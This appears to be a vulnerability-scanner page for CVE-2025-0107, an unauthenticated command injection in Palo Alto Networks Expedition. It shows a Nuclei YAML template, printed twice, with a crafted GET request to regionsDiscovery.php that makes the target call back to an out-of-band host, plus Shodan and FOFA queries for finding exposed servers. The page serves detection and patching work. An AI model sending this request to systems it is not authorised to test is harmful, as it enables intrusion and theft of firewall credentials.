Palo Alto Networks Expedition - OS Command Injection

CVE-2025-0107

Verified

Description

An OS command injection vulnerability in Palo Alto Networks Expedition enables an unauthenticated attacker to run arbitrary OS commands as the www-data user in Expedition, which results in the disclosure of usernames, cleartext passwords, device configurations, and device API keys for firewalls running PAN-OS software.

Severity

Critical

CVSS Score

9.8

Exploit Probability

81%

Published Date

May 27, 2025

Template Author

iamnoooob, pdresearch

CVE-2025-0107.yaml

id: CVE-2025-0107

info:
  name: Palo Alto Networks Expedition - OS Command Injection
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    An OS command injection vulnerability in Palo Alto Networks Expedition enables an unauthenticated attacker to run arbitrary OS commands as the www-data user in Expedition, which results in the disclosure of usernames, cleartext passwords, device configurations, and device API keys for firewalls running PAN-OS software.
  impact: |
    Unauthenticated attackers can execute arbitrary OS commands on Palo Alto Networks Expedition servers, leading to disclosure of sensitive firewall credentials, configurations, and API keys that could compromise all connected PAN-OS firewalls.
  remediation: |
    Upgrade to the latest patched version of Palo Alto Networks Expedition as specified in the vendor security advisory.
  reference:
    - https://security.paloaltonetworks.com/PAN-SA-2025-0001
    - https://ssd-disclosure.com/ssd-advisory-palo-alto-expedition-rce-regionsdiscovery/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-0107
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    epss-score: 0.8102
    epss-percentile: 0.99128
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Expedition"
    fofa-query: title=="Expedition Project"
  tags: cve,cve2025,rce,paloalto,expedition,vkev,vuln

http:
  - raw:
      - |
        GET /API/regionsDiscovery.php?master=spark%3A%2F%2F{{interactsh-url}}:443&mask=26&project=your_project&devices=device1%2Cdevice2&mtserver=127.0.0.1%3A3306&mtuser=root&mtpassword=paloalto&task-id=1193&mode=pre-analysis&regions=&parquetPath=%2Ftmp&timezone=Europe%2FHelsinki&mlserver=127.0.0.1&debug=false&initDate=2023-01-01&endDate=2023-01-31 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'msg":"Started'
          - '"success":true'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 490a00463044022027d3945218021a4d8a73ca8139f8cb41764ec74ebf9babaf45c5cd472d9c8ebe022027e2cb77ec7690a3da5f8bc6e68e0261e0a28c4d1671eecb91f248100bed4dd9:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

https://security.paloaltonetworks.com/PAN-SA-2025-0001 https://ssd-disclosure.com/ssd-advisory-palo-alto-expedition-rce-regionsdiscovery/https://nvd.nist.gov/vuln/detail/CVE-2025-0107

Remediation Steps

Upgrade to the latest patched version of Palo Alto Networks Expedition as specified in the vendor security advisory.

Description

id: CVE-2025-0107

info:
  name: Palo Alto Networks Expedition - OS Command Injection
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    An OS command injection vulnerability in Palo Alto Networks Expedition enables an unauthenticated attacker to run arbitrary OS commands as the www-data user in Expedition, which results in the disclosure of usernames, cleartext passwords, device configurations, and device API keys for firewalls running PAN-OS software.
  impact: |
    Unauthenticated attackers can execute arbitrary OS commands on Palo Alto Networks Expedition servers, leading to disclosure of sensitive firewall credentials, configurations, and API keys that could compromise all connected PAN-OS firewalls.
  remediation: |
    Upgrade to the latest patched version of Palo Alto Networks Expedition as specified in the vendor security advisory.
  reference:
    - https://security.paloaltonetworks.com/PAN-SA-2025-0001
    - https://ssd-disclosure.com/ssd-advisory-palo-alto-expedition-rce-regionsdiscovery/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-0107
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    epss-score: 0.8102
    epss-percentile: 0.99128
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Expedition"
    fofa-query: title=="Expedition Project"
  tags: cve,cve2025,rce,paloalto,expedition,vkev,vuln

http:
  - raw:
      - |
        GET /API/regionsDiscovery.php?master=spark%3A%2F%2F{{interactsh-url}}:443&mask=26&project=your_project&devices=device1%2Cdevice2&mtserver=127.0.0.1%3A3306&mtuser=root&mtpassword=paloalto&task-id=1193&mode=pre-analysis&regions=&parquetPath=%2Ftmp&timezone=Europe%2FHelsinki&mlserver=127.0.0.1&debug=false&initDate=2023-01-01&endDate=2023-01-31 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'msg":"Started'
          - '"success":true'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 490a00463044022027d3945218021a4d8a73ca8139f8cb41764ec74ebf9babaf45c5cd472d9c8ebe022027e2cb77ec7690a3da5f8bc6e68e0261e0a28c4d1671eecb91f248100bed4dd9:922c64590222798bb761d5b6d8e72950

Palo Alto Networks Expedition - OS Command Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Palo Alto Networks Expedition - OS Command Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps